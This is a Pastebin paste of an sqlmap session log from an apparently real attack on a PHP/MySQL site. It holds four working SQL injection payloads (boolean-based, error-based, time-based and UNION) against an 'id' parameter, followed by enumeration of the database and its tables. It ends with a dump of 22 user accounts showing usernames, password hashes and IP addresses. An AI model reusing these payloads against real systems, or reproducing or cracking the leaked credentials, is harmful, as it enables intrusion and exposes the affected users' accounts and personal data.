API tools faq
paste
pahapoika91

sqlmap log.

pahapoika91
Oct 1st, 2016
63
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.20 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
  2. ---
  3. Parameter: id (GET)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
  7.  
  8. Type: error-based
  9. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  10. Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
  11.  
  12. Type: AND/OR time-based blind
  13. Title: MySQL >= 5.0.12 AND time-based blind
  14. Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
  15.  
  16. Type: UNION query
  17. Title: Generic UNION query (NULL) - 14 columns
  18. Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
  19. ---
  20. web server operating system: Linux CentOS 6.8
  21. web application technology: PHP 7.0.10, Apache 2.2.15
  22. back-end DBMS: MySQL >= 5.0
  23. sqlmap resumed the following injection point(s) from stored session:
  24. ---
  25. Parameter: id (GET)
  26. Type: boolean-based blind
  27. Title: AND boolean-based blind - WHERE or HAVING clause
  28. Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
  29.  
  30. Type: error-based
  31. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  32. Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
  33.  
  34. Type: AND/OR time-based blind
  35. Title: MySQL >= 5.0.12 AND time-based blind
  36. Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
  37.  
  38. Type: UNION query
  39. Title: Generic UNION query (NULL) - 14 columns
  40. Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
  41. ---
  42. web server operating system: Linux CentOS 6.8
  43. web application technology: PHP 7.0.10, Apache 2.2.15
  44. back-end DBMS: MySQL >= 5.0
  45. available databases [2]:
  46. [*] information_schema
  47. [*] visagik_db16_usa
  48.  
  49. sqlmap resumed the following injection point(s) from stored session:
  50. ---
  51. Parameter: id (GET)
  52. Type: boolean-based blind
  53. Title: AND boolean-based blind - WHERE or HAVING clause
  54. Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
  55.  
  56. Type: error-based
  57. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  58. Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
  59.  
  60. Type: AND/OR time-based blind
  61. Title: MySQL >= 5.0.12 AND time-based blind
  62. Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
  63.  
  64. Type: UNION query
  65. Title: Generic UNION query (NULL) - 14 columns
  66. Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
  67. ---
  68. web server operating system: Linux CentOS 6.8
  69. web application technology: PHP 7.0.10, Apache 2.2.15
  70. back-end DBMS: MySQL >= 5.0
  71. Database: visagik_db16_usa
  72. [31 tables]
  73. +-------------------+
  74. | UserQueryLog |
  75. | feedback_calls |
  76. | rec_content |
  77. | rec_establishment |
  78. | rec_permissions |
  79. | rec_person |
  80. | rec_person_temp |
  81. | rec_postpone |
  82. | rec_question |
  83. | rec_question_com |
  84. | rec_question_sub |
  85. | rec_rules |
  86. | rec_text |
  87. | rec_time_grid |
  88. | rec_window |
  89. | tab_content |
  90. | tab_tablo |
  91. | tab_text |
  92. | web_bl |
  93. | web_content |
  94. | web_countries |
  95. | web_google |
  96. | web_lang |
  97. | web_log |
  98. | web_menu_type |
  99. | web_news |
  100. | web_pincode |
  101. | web_text |
  102. | web_users |
  103. | web_who |
  104. | web_wl |
  105. +-------------------+
  106.  
  107. sqlmap resumed the following injection point(s) from stored session:
  108. ---
  109. Parameter: id (GET)
  110. Type: boolean-based blind
  111. Title: AND boolean-based blind - WHERE or HAVING clause
  112. Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
  113.  
  114. Type: error-based
  115. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  116. Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
  117.  
  118. Type: AND/OR time-based blind
  119. Title: MySQL >= 5.0.12 AND time-based blind
  120. Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
  121.  
  122. Type: UNION query
  123. Title: Generic UNION query (NULL) - 14 columns
  124. Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
  125. ---
  126. web server operating system: Linux CentOS 6.8
  127. web application technology: PHP 7.0.10, Apache 2.2.15
  128. back-end DBMS: MySQL >= 5.0
  129. Database: visagik_db16_usa
  130. Table: web_users
  131. [11 columns]
  132. +------------+--------------+
  133. | Column | Type |
  134. +------------+--------------+
  135. | block_time | datetime |
  136. | bp | tinyint(4) |
  137. | fullname | varchar(50) |
  138. | ID | mediumint(9) |
  139. | ip | varchar(15) |
  140. | lastip | varchar(15) |
  141. | lastlogin | datetime |
  142. | password | varchar(100) |
  143. | permision | tinyint(4) |
  144. | status | tinyint(4) |
  145. | username | varchar(60) |
  146. +------------+--------------+
  147.  
  148. sqlmap resumed the following injection point(s) from stored session:
  149. ---
  150. Parameter: id (GET)
  151. Type: boolean-based blind
  152. Title: AND boolean-based blind - WHERE or HAVING clause
  153. Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
  154.  
  155. Type: error-based
  156. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  157. Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
  158.  
  159. Type: AND/OR time-based blind
  160. Title: MySQL >= 5.0.12 AND time-based blind
  161. Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
  162.  
  163. Type: UNION query
  164. Title: Generic UNION query (NULL) - 14 columns
  165. Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
  166. ---
  167. web server operating system: Linux CentOS 6.8
  168. web application technology: PHP 7.0.10, Apache 2.2.15
  169. back-end DBMS: MySQL >= 5.0
  170. Database: visagik_db16_usa
  171. Table: web_users
  172. [22 entries]
  173. +----------------------------------+-----------------+----+-------------------+
  174. | password | ip | ID | username |
  175. +----------------------------------+-----------------+----+-------------------+
  176. | 4f91a192c48c484a50d4fd88d5eb489b | 62.141.88.108 | 1 | Dmitry |
  177. | 434c68728c1839fd38c02bd947d91d5d | 62.141.88.108 | 2 | Pavel |
  178. | 1bac08d672c82a1915ac2cb0a8d9ffe2 | <blank> | 22 | Nikolay |
  179. | c77cd64a279c7de762e4cd881c7b3957 | 50.254.120.117 | 4 | moderator_hs |
  180. | c77cd64a279c7de762e4cd881c7b3957 | 64.128.167.178 | 5 | moderator_ny |
  181. | c77cd64a279c7de762e4cd881c7b3957 | 66.235.33.42 | 6 | moderator_se |
  182. | c77cd64a279c7de762e4cd881c7b3957 | 104.184.155.153 | 7 | moderator_sf |
  183. | c77cd64a279c7de762e4cd881c7b3957 | 96.88.232.237 | 8 | moderator_wa |
  184. | 42ae7ee7cee7b215d85ee4d84376adae | <blank> | 9 | consul_wa |
  185. | b5520230f586a3e3aa0a175ec37ffb12 | 62.141.88.108 | 11 | Vorontsova |
  186. | fea800e827a96e55ba02cf3436e65c54 | 50.254.120.117 | 12 | operator_hs |
  187. | e2a906ee7656cedcc7f0d2c059fbfd5a | 64.128.167.178 | 13 | operator_ny |
  188. | 5263d4292504fbfe00f2e701296b3261 | 66.235.33.42 | 14 | operator_se |
  189. | cf1bba38274da6910cca5796d29445c1 | 104.184.155.153 | 15 | operator_sf |
  190. | 1fb621fdb40464d47af3600dd9974556 | 96.88.232.237 | 16 | operator_wa |
  191. | 9c63533f13e01c6551fd80408fa48b39 | <blank> | 17 | kzu_washington |
  192. | 006232654f333fd71aec9769eea0fb49 | <blank> | 18 | kzu_new_york |
  193. | 5e430651e50adf0c0538b433c391f5e9 | <blank> | 19 | kzu_houston |
  194. | 9439cdce408287f42ae6dc64b2fad909 | <blank> | 20 | kzu_seattle |
  195. | d8dc8bee84f2965895eee76db960c9d6 | <blank> | 21 | kzu_san_francisco |
  196. | 9650ed717b9e85bf93fd13f2c2f2271b | <blank> | 23 | Content |
  197. | 15d13927dd8d3f8be287d2715a9c7def | <blank> | 24 | Nikolai |
  198. +----------------------------------+-----------------+----+-------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!